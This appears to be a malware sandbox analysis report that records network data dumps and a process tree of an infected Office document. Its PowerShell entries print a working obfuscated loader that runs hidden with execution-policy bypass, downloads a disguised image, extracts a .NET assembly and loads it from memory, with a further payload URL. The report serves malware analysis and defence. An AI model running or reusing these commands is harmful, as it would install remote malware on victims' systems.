                                                2024-09-11 18:22:22 UTC16384INData Raw: dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d aa 8a 58 92 43 15 24 76 1f
                                                Data Ascii: q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]XC$v
                                                2024-09-11 18:22:22 UTC16384INData Raw: 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28 56 0e a7 72 f1 47 eb d7 8c
                                                Data Ascii: 62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(VrG
                                                2024-09-11 18:22:22 UTC16384INData Raw: 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93 ea b0 09 e3 25 27 75 72 43
                                                Data Ascii: <U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|%'urC
                                                2024-09-11 18:22:22 UTC16384INData Raw: 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad 53 23 6a da 35 44 24 ed 6d
                                                Data Ascii: e`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pWS#j5D$m
                                                2024-09-11 18:22:22 UTC16384INData Raw: e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a 7e 7e f8 19 92 e9 55 d6 49
                                                Data Ascii: is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z~~UI


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:14:22:12
                                                Start date:11/09/2024
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                Imagebase:0x13f0b0000
                                                File size:1'423'704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:14:22:13
                                                Start date:11/09/2024
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543'304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:14:22:16
                                                Start date:11/09/2024
                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS"
                                                Imagebase:0xca0000
                                                File size:141'824 bytes
                                                MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:14:22:17
                                                Start date:11/09/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?BT? ? ? ? ?E8? ? ? ? ?TgBV? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?y? ? ? ? ?DQ? ? ? ? ?Lw? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dk? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?D? ? ? ? ?? ? ? ? ?OQ? ? ? ? ?u? ? ? ? ?DU? ? ? ? ?N? ? ? ? ?? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?OgBw? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?FI? ? ? ? ?ZQBn? ? ? ? ?EE? ? ? ? ?cwBt? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                Imagebase:0x1310000
                                                File size:427'008 bytes
                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:14:22:18
                                                Start date:11/09/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
